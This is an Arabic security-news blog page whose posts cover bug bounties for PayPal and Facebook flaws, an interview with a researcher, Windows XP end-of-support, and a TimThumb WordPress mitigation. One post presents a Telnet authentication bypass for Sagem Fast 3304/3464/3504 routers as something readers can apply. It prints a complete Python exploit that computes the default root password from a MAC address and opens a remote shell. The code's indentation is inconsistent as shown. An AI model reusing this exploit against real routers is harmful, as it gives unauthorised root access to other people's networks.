‏إظهار الرسائل ذات التسميات exploit. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات exploit. إظهار كافة الرسائل

12 الف دولار مكافاءة لخليل الشريتح , لكن ليس من طرف الفايسبوك !


بعد ان رفضت ادارة الفايسبوك مكافاة مكتشف الثغرة الفلسطيني خليل الشريتح .
ها هو موقع Gofundme يستعد لمنحه مكافاة بقدر 12 ألف دولار.
الموقع عبارة عن مركز لجمع التبرعات لمكتشفي الثغرات , اذا تم جمع هذه القيمة في اقل من 3 ايام من 226 شخص حول العالم.
اذ كتب الموقع كاعلان لجمع التبرعات :" لقد رفضت ادارة الفايسبوك منح مستحقات الشاب الفلسطيني الذي يمضي وقته في البحث بسبب سوء تفاهم بينه و بين الادارة , فلنرسل رسالة لكل الباحثين في الحماية حول العالم لنساعد هذا الباحث الفلسطيني و نشجعه في اكمال مسيرته"
المبلغ المراد الوصول اليه كان 10 الاف دولار ليتخطى ذلك بالفي دولار في اقل من 3 ايام .
هاكينغ نيوز : يونس الزرهوني
إقرأ المزيد.. bloggeradsenseo

پايبال تصلح ثغرة أمنية تمكن الهاكرز من حذف أي حساب كيف ما كان نوعه

قام الباحث في مجال الأمن المعلوماتي Ionut Cernica باكتشاف تغرة في الموقع الشهير پايپال ، هاته الأخيرة التي تمكنه من حذف أي حساب على الموقع و إنشاء حساب جديد بنفس إسم مستخدم الحساب الذي قام بحذفه ، حيث تكمن خطورة هاته الثغرة في إمكانية استغلالها عن بعد بدون أي تفاعل مع الضحية 

حيث أضاف مكثشف التغرة أنه في حالة توفرك على حساب أمريكي US فإنك تستطيع إظافة إيميل جديد لذالك الحساب حيث بعد إضافته مباشرة يحذف الإيميل الأصلي لذلك المستخدم وإنشاء حساب جديد بدون الحاجة إلى توصلك برسالة تخبرك أنه عليك أن تفعل ذلك الحساب

وبناء على ذلك قامت شركة پايپال بمكافئة للباحث الأمني بمبلغ مالي قدره 5000 دولار أمريكي أي مايعادل 3750 أورو، حيث يمكنكم الإطلاع على ماهية هاته التغرة في هذا الشريط الڤيديو أسفله



محمد لحلو : ثغرات أمنية
إقرأ المزيد.. bloggeradsenseo

حوار حصري لهاكينغ نيوز مع خليل مكتشف تغرة الفيسبوك

في خضم آخر الأحداث التي تروج على الساحة الإفتراضية من بينها إكتشاف آخر ثغرة على موقع التواصل الإجتماعي فيسبوك من طرف شاب فلسطيني مهووس بالبرمجة و الأمن المعلوماتي ، والذي كان لموقع هاكينغ نيوز ان يكون اول موقع ينشر 
خبر بتواجدها حيث يمكنك مشاهدة الخبر خلال هذا الرابط  خبير امني عربي يرفض الإفصاح عن إسمه يكتشف ثغرة خطيرة في 
حوار حصري لهاكينغ نيوز مع خليل مكتشف تغرة الفيسبوك

و في هذا الصدد عرضنا عليه حوارا يتضمن العديد من التساؤلات التي نتطلع من خلالها تقريبكم من هذا الشاب الطموح و كيف تمكن
من إكتشاف هاته التغرة
ما هي الدوافع التي جعلتك تقتحم عالم الامن المعلوماتي و هل قمت بدراسة مسبقة في هذال المجال ؟ -

هواية في الاساس و من ثم حب الاطلاع على كل ماهو غامض في عالم التكنولوجيا

ما هي أهم إنجازاتك في هذا الميدان ؟ -

الفيس بوك ليس اول موقع اكتشف به ثغرة كان هنالك العديد من المواقع المحلية و العالمية

بالنسبة لك ما هي أهم النصائح التي يجب على أي شخص اتباعها للولوج في عالم الحماية المعلوماتية ؟ -

هنالك عدة خطوات للوصول الى عالم الأمن ، اهمها اتقان لغات برمجية ، فكلما اتقنت لغات برمجية اكثر كلما زادت خبرتك بالحماية. تعلم الهكر ولكن ليس العمل به ، الصبر حاولة فهم دايناميكية اكبر مواقع العالم وكيف تعمل . حب العمل ،الاصرار و المثابرة و عدم اليأس

بخصوص الثغرة التي وجدت في موقع فيسبوك ؟ كيف تم اكتشافها ؟ هل عن طريق الصدفة أم بعد بحث في الموضوع ؟ -

ليس بالصدفة وليس بموضوع , بل اثناء تعديل اكواد برمجية في تطبياق الفيس بوك لاحظت وجود كود غير محمي لذلك , قمت بالتعديل عليه وحصلت على استجابة من السيرفر

كيف كانت ردة فعل فريق الحماية التابع لموقع فيسبوك عندما قمت بتنزيل ذلك التحديث على حائط مارك زاكربيرغ ؟ -

لا استطيع ان اعرف كيف كان شعورهم لكن اتوقع انهم اصيبوا بالجنون

وهل واجهت صعوبة في التعامل معهم ؟ -

واجهت صعوبة في التعامل معهم من رفض اعترافهم بها كثغرة








إقرأ المزيد.. bloggeradsenseo

القراصنة يستغلون التوقف النهائي لتحديثات الاكس بي لتحقيق إنجازات جديدة

 من المرتقب أن يقوم فريق ميكروسوفت في الثامن من أبريل القادم بالتخلي عن دعم نظام ويندوز إكس بيحيث أن الشركة ستتوقف عن إطلاق تحديثات جديدة على المستوى الامني لنظامها القديم وتحاول الشركة جاهدة إقناع عملائها على التخلي عن نظام ويندوز اكس بي القديم و اختيار أنظمة أحدث من الويندوز لكنها تجد صعوبة في ذالك على اعتبار ان عدد كبير من هؤلاء متعلقون بنظام اكس بي حيث تشيرالإحصائيات ان 37 في المئة مازالوايستعملون ويندوز اكس بي كنظام تشغيل اساسي

أما بالنسبة لخبراء الامن المعلوماتي قائلين بأن النظام سوف يصبح كجنة للقراصنة من حيث كتابة تغرات جديد تسمح لهم بتطبيقها على النضام الذي سوف تتوقف تحدياتته ، حيث قد يتمكنون أيضا من التوصل إلى اكتشاف تغرات اخرى في ويندوز 7 و 8

هذا مبيان يبين مدى تغرات الويندوز مقارنة مع الأنضمة الأخرى

محمد لحلو : ثغرات أمنية

إقرأ المزيد.. bloggeradsenseo

ثغرة تجاوز نافذة التحقق من المستخدم في روتر إتصالات المغرب Sagem Router Fast 3304

  ثغرة في التلنت خاصة بروتر إتصالات المغرب 
Sagem Router Fast 3304
تمكنك من تجاوز إستخدام الباسوورد وإسم
المستخدم لولوج لوحة تحكم الروتر بصلاحيات الروت . وقد قام بإكتشافها الوفيق علي فيما يمكنك كذلك تطبيق الثغرة على كل من إصدارات 3464/3504
وهذا كود الثغرة مكتوب باللغة البايثون 






#!/home/bin/python




# Remote Exploit: SAGEM ROUTER FAST 3304/3464/3504 - Telnet Authentication bypass


# Date: 15-August-2011


# Author: Elouafiq Ali


# Version: 3304-V1 / 3304-V2 / 3464 / 3504


# Tested on: Linux Ubuntu 11.04, Linux Backtrack 5


# Tested Router: SAGEM FAST 3304-V2


# Tested on Resellers/ISPs: Wanadoo (France), Maroc Telecom (Morocco)


# Products affected: Sagem Fast 3304-V1 / 3304-V2 / 3464 / 3504


# Blog: http://keelhaule.tumblr.com




"""


    Sagem Fast Routers (3304-V1 / 3304-V2 / 3464 / 3504) Come with a default Preconfigured Root Password


    That the ISPs don't change it, but instead they create another admin account above it,


    the root password differs from a router to another, since it is computed from its MAC address.


    Thus, each unique router has its own password what makes bruteforce or dictionary attacks inefficient or impossible


    After reverse engineering the Algorithm that computes the default password based on the MAC address


    This exploit opens a remote shell in the remote host.


    (Generally its an Almquist Shell 'ash', which commands are compatible to the Bourne Shell 'bsh')




    Usage: ./{file_name} ip_adress mac_address


"""






from telnetlib import Telnet


import time, sys, tty, termios


from threading import *




host = ''


port = 23


user = "root"


password=""


class ReaderThread(Thread):


        def __init__(self, telnet):


                self.telnet = telnet


                Thread.__init__(self)


         


        def run(self):


                while 1:


                        str = self.telnet.read_some()


                        if str == '': break


                        sys.stdout.write(str)


                        sys.stdout.flush()


def mash(a,b):


  first=min(a,b)


  second=max(a,b)


  if( int(second ,16 ) < 10) :


    if(int(first,16)+int(second,16)<=9):


      return chr(ord(first)+int(second,16))


    else:


      return hex(ord(first)+int(second,16))


  else:


      return chr(ord(second)+int(first,16))




def main(host, port):


        telnet = Telnet()


        telnet.open(host, port)


    #Usually Telnet prompt starts with this, if the telnet service provide another


    #prompt, change it to that prompt


    telnet.read_until("login: ")


    telnet.write(user + "\n")


    #the note above also applies for this


    telnet.read_until("Password: ")


    telnet.write(password + "\n")


    #just omit this line if you want to just have the telnet command prompt,


    #or change it to what feel confortable with


    telnet.write("shell\n")


        reader = ReaderThread(telnet)


        reader.start()




    fd = sys.stdin.fileno()


    old_settings = termios.tcgetattr(fd)


    tty.setraw(fd)


        while 1:


                if not reader.isAlive(): break


        ch = sys.stdin.read(1)


                telnet.write(ch)


        telnet.close()


    termios.tcsetattr(fd, 1, old_settings)




if __name__ == '__main__':


        try:


                host = sys.argv[1]


        except: pass


    mac_address=sys.argv[2]


    lenght=len(mac_address)


    #some arbitrary value


    password=[ c for c in "00000000" ]


    if lenght!=12 :


        # Input Sanitization and Normalization


        if lenght==17:


            if mac_address[2]==':' :


                mac_address = "".join([i.zfill(2) for i in mac_address.split(":")]).lower()


            elif mac_address[2]=='-' :


                mac_address = "".join([i.zfill(2) for i in mac_address.split(":")]).lower()


            else:  


                print  '[!] Please enter a valid MAC address!' 


                exit()


        else:


            print  "[!] Please enter a valid MAC address!"


            exit()


     


    mac=[ c.lower() for c in mac_address]




    password[0]= mash(mac[5],mac[11])


    password[1]= mash(mac[0],mac[2])


    password[2]= mash(mac[10],mac[11])


    password[3]= mash(mac[0],mac[9])


    password[4]= mash(mac[10],mac[6])


    password[5]= mash(mac[3],mac[9])


    password[6]= mash(mac[1],mac[6])


    password[7]= mash(mac[3],mac[4])


    password="".join(p for p in password)


    print "[+] W00t The Passwd is ", password


        main(host, port)



إقرأ المزيد.. bloggeradsenseo

ثغرة جديدة في مجلة وردبريس TimThumb 1.33 Zero-day

  TimThumb تم الكشف عن ثغرة يوم الصفر في  اداة تقوم بإعادة تنسيق الصور يطلق عليها إسم
   والتي تستعملها مجلة  وردبريس  . الثغرة تمكن المهاجم من ان يقوم بتحميل وتنفيذ الاكواد من دون تصاريح المدير . المجلات
المصابة اكثر من 30 مليون حسب نتائج البحث في غوغل .



الإصدار المصاب وطريقة الحماية من الهجوم
TimThumb 1.33
طريقة الحماية من الهجوم
الموجودة على مجلتك  TimThumb .php لتفادي الهجوم ادخل إلى  ملفات الورد بريس وابحث عن 
 بعد إيجاد كافة الصفحات قم الان بتعديلها تباعا بإتباع الاتي
  $allowedSites = array (       إفتح الصفحة وابحث عن
  $allowedSites = array(); قم بمسح كافة المواقع مثل بلوغر او فيليكر ... ليصبح الكود على الشكل الاتي
 احفظ التغيرات


www.th3pro.com المصدر 

إقرأ المزيد.. bloggeradsenseo

تابعنا على الفيسبوك

إجمالي مرات مشاهدة الصفحة

بث المحترف

التسميات

التسميات

إلتحق بصفحتنا على الفيسبوك

يتم التشغيل بواسطة Blogger.

الموضوعات الأكثر زياره فى المدونه خلال 7 ايام الماضية

Privacy-Policy| إتفاقية الإستخدام تصميم : يزيد خراطي